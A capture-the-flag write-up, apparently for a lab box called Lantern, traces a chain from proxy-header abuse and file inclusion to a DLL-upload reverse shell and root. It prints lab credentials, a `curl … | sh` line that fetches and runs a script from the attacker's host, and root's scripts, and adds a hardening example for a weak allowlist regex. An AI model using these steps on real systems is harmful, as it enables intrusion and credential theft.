Simple website serving some HTML. The Vacancies page seems interesting. Upon uploading a file that ends with .pdf we get "Thank you! We will conact you very soon!"
No subdomains or interesting files found on port 80.
The file upload only accepted PDFs. I tried uploading malicious payloads (malicious-pdf), but got no callback, and XSS didn't work either.
HTTP (3000) [Enum]
Some kind of admin panel, which seems to be using Blazor.
Hmmm..
Communication happens over WebSockets?
Feroxbuster with the common.txt wordlist found /error.
In the response headers we also get Server: Kestrel.
HTTP (80)
Skipper Proxy
Port 80 also runs Blazor, and the response headers include Server: Skipper Proxy.
While searching for common Blazor files I came across chanan/BlazorStyled/docs/_framework, which had interesting files such as JSONs. The files were not readable unless we used the X-Skipper-Proxy header:
Internal
Note: Using the proxy key we are able to see all DLLs used by the Blazor application in the Network tab.
Add the X-Skipper-Proxy key to Burp requests and then we are able to see the internal pages of the website.
SQLi
The Book Vacation page is vulnerable to SQLi.
Based on it being a .NET application I assumed the database was MSSQL, but it's sqlite3?!
110% a rabbit hole, as the database is controlled by JavaScript 💀
HTTP (3000) [Admin]
Creds: admin:AJbFA_Q@925p9ap#22
Admin Dashboard
File Upload
If we try to upload a web shell via Upload Content, we can't execute it, because it is served with Content-Type: application/octet-stream.
Source
In Files we can get the source of the app:
LFI
LFI successful.
There's a database somewhere...
I tried getting the programs' cmdlines, but for whatever reason they were empty for almost all PIDs.
Components
If we enter an incorrect module name we get the path to the components:
Craft a malicious payload:
I tried changing the path while the file was being uploaded, but wasn't able to get it into the components directory. If we reverse the process and point to the images directory, another error happens.
Most probably no permission to read the file..
It also seems case-sensitive.
SHEEEEEEEEEEEEEEEEEEEEEH!! After so much blood and sweat I finally managed to get the right DLL type to get a reverse shell.
└─$ ssh tomas@10.129.131.78 -i ssh/tomas/id_rsa
tomas@lantern:~$ sudo -l
Matching Defaults entries for tomas on lantern:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tomas may run the following commands on lantern:
(ALL : ALL) NOPASSWD: /usr/bin/procmon
tomas@lantern:~$ curl 10.10.14.22/lp.sh|sh|tee /dev/shm/lp.log
...
╔══════════╣ Mails (limit 50)
20774 4 -rw-r--r-- 1 tomas mail 539 Jul 31 12:00 /var/mail/tomas
20774 4 -rw-r--r-- 1 tomas mail 539 Jul 31 12:00 /var/spool/mail/tomas
...
tomas@lantern:/var/mail$ cat tomas
From hr@lantern.htb Mon Jan 1 12:00:00 2023
Subject: Welcome to Lantern!
Hi Tomas,
Congratulations on joining the Lantern team as a Linux Engineer! We're thrilled to have you on board.
While we're setting up your new account, feel free to use the access and toolset of our previous team member. Soon, you'll have all the access you need.
Our admin is currently automating processes on the server. Before global testing, could you check out his work in /root/automation.sh? Your insights will be valuable.
Exciting times ahead!
Best.
root@lantern:~# cat cleanup.sh
#!/bin/bash

# Directory to clean up in /opt/components
DIR_COMPONENTS="/opt/components"

# Files to exclude in /opt/components
EXCLUDE_FILES_COMPONENTS=("FileTree.dll" "FileUpload.dll" "HealthCheck.dll" "Logs.dll" "Resumes.dll")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_COMPONENTS=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_COMPONENTS[@]}")
EXCLUDE_PATTERN_COMPONENTS=${EXCLUDE_PATTERN_COMPONENTS:1} # Remove leading '|'

# Find and delete files not in the exclude list in /opt/components
/usr/bin/find "$DIR_COMPONENTS" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_COMPONENTS" | while read -r file; do
    /bin/rm -f "$file"
done

# Directory to clean up in /var/www/sites/lantern.htb/static/images
DIR_IMAGES="/var/www/sites/lantern.htb/static/images"

# Files to exclude in /var/www/sites/lantern.htb/static/images
EXCLUDE_FILES_IMAGES=("about-1.jpg" "about-2.jpg" "about.jpg" "avatar-1.jpg" "avatar-2.jpg" "avatar.jpg" "bg-bot.jpg" "bg-top.jpg" "blog-1.jpg" "blog-2.jpg" "blog-3.jpg")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_IMAGES=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_IMAGES[@]}")
EXCLUDE_PATTERN_IMAGES=${EXCLUDE_PATTERN_IMAGES:1} # Remove leading '|'

# Find and delete files not in the exclude list in /var/www/sites/lantern.htb/static/images
/usr/bin/find "$DIR_IMAGES" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_IMAGES" | while read -r file; do
    /bin/rm -f "$file"
done

/usr/sbin/service blazor-server restart
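The allowlist in cleanup.sh is built into an unanchored extended regex with unescaped dots, so `grep -Ev` keeps any path that merely contains one of the five names rather than exactly one of them. The script below is an added example, not part of the writeup or of the box's own cleanup.sh: it rebuilds the same pattern and compares it with an exact-basename check on constructed paths (the names ALLOWED, original_keeps and hardened_keeps are assumed here).

```shell
#!/bin/sh
# Added example, not part of the writeup or of cleanup.sh itself.
# Rebuilds cleanup.sh's exclusion pattern and shows why it keeps more than
# the five intended names, next to an exact-basename check.
# Only constructed paths are used; nothing on disk is touched.

# Same names as EXCLUDE_FILES_COMPONENTS in cleanup.sh.
ALLOWED="FileTree.dll FileUpload.dll HealthCheck.dll Logs.dll Resumes.dll"

# Mirrors cleanup.sh: join the names with '|' and drop the leading '|'.
# The result is an unanchored ERE in which '.' matches any character.
build_pattern() {
    pattern=""
    for f in $ALLOWED; do
        pattern="${pattern}|${f}"
    done
    printf '%s' "${pattern#|}"
}

# Returns 0 when cleanup.sh's 'grep -Ev' would keep the path (the pattern
# matches somewhere in the full path), 1 when it would be deleted.
original_keeps() {
    printf '%s\n' "$1" | grep -Eq "$(build_pattern)"
}

# Hardened variant: compare the basename to each allowed name exactly.
hardened_keeps() {
    name=$(basename -- "$1")
    for f in $ALLOWED; do
        [ "$name" = "$f" ] && return 0
    done
    return 1
}

# Report a few constructed paths side by side.
report() {
    for p in "$@"; do
        o=deleted; h=deleted
        original_keeps "$p" && o=kept
        hardened_keeps "$p" && h=kept
        printf '%-36s original:%-8s hardened:%s\n' "$p" "$o" "$h"
    done
}

report /opt/components/FileTree.dll \
       /opt/components/NotFileTree.dll \
       /opt/components/LogsXdll \
       /opt/components/Shell.dll
```

The same construction is used for the images directory, so an equivalent exact-name check applies there too.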
root@lantern:~# file bot.exp
bot.exp: a /usr/bin/expect -f script, ASCII text executable
root@lantern:~# cat bot.exp
#!/usr/bin/expect -f
spawn nano /root/automation.sh
set text "echo Q3Eddtdw3pMB | sudo ./backup.sh"
while {1} {
    foreach char [split $text ""] {
        send "$char"
        sleep 1
    }
    send "\r"
    sleep 0.5
    for {set i 0} {$i < [string length $text]} {incr i} {
        send "\b \b" ;
    }
    send "\r"
}